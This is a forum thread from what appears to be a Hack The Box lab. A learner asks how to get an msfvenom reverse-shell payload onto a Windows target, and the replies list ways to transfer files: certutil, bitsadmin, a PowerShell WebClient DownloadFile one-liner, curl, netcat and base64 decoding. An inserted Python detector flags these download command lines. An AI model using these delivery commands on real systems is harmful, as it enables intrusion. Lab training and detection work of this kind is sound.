Hi
I was able to create a reverse shell payload with msfvenom.
But how do I copy this payload manually over to the target Windows machine to test my reverse TCP shell?
If the target machine is Windows then:
via shares (create a Samba share on your Linux) | connect and download
via web (set up Apache or an HTTP server on your Linux) | connect and download
via PowerShell (Invoke-WebRequest)
If the target is Linux then:
wget the file from your webserver
sftp the file to the machine
@vizkiz said:
Hi
I was able to create a reverse shell payload with msfvenom.
But how do I copy this payload manually over to the target Windows machine to test my reverse TCP shell?
Just to add in to the great list from @acidbat
Windows:
Certutil can be used as a downloader
PowerShell gives you lots of options: (New-Object System.Net.WebClient).DownloadFile("http://YourIP/FiLe.ExT", "TARGET PATH")
or IEX etc
BitsAdmin can be used as a downloader
(There are lots and lots of options - look at LOLBAS for other examples)
Linux
Curl works as well
Netcat
Cross platform:
SCP (needs SSH creds)
Base64 - encode your binary, copy the base64 and paste it into a decode (e.g. on Linux: echo "yourbase64code" | base64 -d > evilfilename)
Set up an FTP server on your attacking machine and connect in from the victim
etc
There are countless ways to get your files onto a victim server. Just be imaginative.
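Seen from the defending side, the transfer methods listed in the two replies above leave recognisable process command lines. The following is an added example, not part of any post in this thread: a small triage function over process-creation command lines, with constructed sample input (tool options elided, documentation-range IP address) and hypothetical function names.

```python
import re

URL = re.compile(r"\b(?:https?|ftp)://[^\s\"')]+", re.I)
# Binaries named in the thread that fetch a remote file when handed a URL.
DOWNLOADERS = {"certutil", "bitsadmin", "curl", "wget"}
# PowerShell download primitives quoted in the thread.
PS_PRIMITIVES = re.compile(r"invoke-webrequest|downloadfile|\biex\b", re.I)
# Base64 decoded straight into a file, as in the thread's Linux one-liner.
B64_TO_FILE = re.compile(r"base64\s+(?:-d|--decode)\b.*>\s*\S+", re.I)

def image_name(cmdline):
    """Lowercase executable name, without directory or .exe suffix."""
    s = cmdline.strip()
    if not s:
        return ""
    first = s[1:].split('"')[0] if s.startswith('"') else s.split()[0]
    name = re.split(r"[\\/]", first)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name

def classify(cmdline):
    """Return triage findings for one process-creation command line."""
    findings = []
    name, url = image_name(cmdline), URL.search(cmdline)
    if name in DOWNLOADERS and url:
        findings.append(f"{name} fetching {url.group(0)}")
    if name in {"powershell", "pwsh"} and PS_PRIMITIVES.search(cmdline):
        findings.append("powershell download primitive")
    if B64_TO_FILE.search(cmdline):
        findings.append("base64 decoded to file")
    return findings

# Constructed sample command lines (options elided, TEST-NET address).
SAMPLE = [
    r"C:\Windows\System32\certutil.exe [options] http://192.0.2.10/f.bin C:\Temp\f.bin",
    r"powershell.exe -c (New-Object System.Net.WebClient).DownloadFile('http://192.0.2.10/f.bin', 'C:\Temp\f.bin')",
    r'"C:\Windows\System32\bitsadmin.exe" [options] http://192.0.2.10/f.bin C:\Temp\f.bin',
    r'echo "QUJD" | base64 -d > /tmp/f.bin',
    r"certutil.exe -hashfile C:\Temp\f.bin SHA256",  # benign: no URL
]

def scan(lines):
    """Map each flagged command line to its findings; clean lines are omitted."""
    return {l: f for l in lines if (f := classify(l))}

if __name__ == "__main__":
    for line, hits in scan(SAMPLE).items():
        print(hits, "<-", line)
```

Hits are triage leads rather than verdicts, since curl, wget and certutil also have routine administrative uses; compare them against a baseline of expected hosts and parent processes.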
Thank you to all of you for help.
But here, I don’t know how to connect to the Windows box 10.10.14.184.
Once I get access to 10.10.14.184, then I can try any of the methods you advised. I am stuck here.
@vizkiz said:
Thank you to all of you for help.
But here, I don’t know how to connect to the Windows box 10.10.14.184.
Once I get access to 10.10.14.184, then I can try any of the methods you advised. I am stuck here.
Why are you trying to connect to 10.10.14.184?
That looks like a user IP address rather than an HTB box.
Sorry, it’s my typo. The Windows box IP in the HTB network is 10.10.10.184, name is ServMon.
I don’t have access to the ServMon box, so how do I copy the payload and execute it?
@vizkiz said:
Sorry, it’s my typo. The Windows box IP in the HTB network is 10.10.10.184, name is ServMon.
I don’t have access to the ServMon box, so how do I copy the payload and execute it?
Ok - that makes a bit more sense, but you’d be better asking the question in the ServMon thread.
If you don’t have access to the machine, how do you know the venom payload is properly configured?
You don’t need to copy any files over for ServMon, so you might be overthinking your approach to this box.
You can’t just copy files over to a remote machine and get them executed. That’s what vulnerabilities and exploits are for. You need to find a way to get the remote machine to execute your commands, so look at which ports it is listening for connections on (using nmap or something similar) and then do research on how you can possibly exploit those services to get remote code execution.
OK, thanks, VbScrub.
I will try to explore more.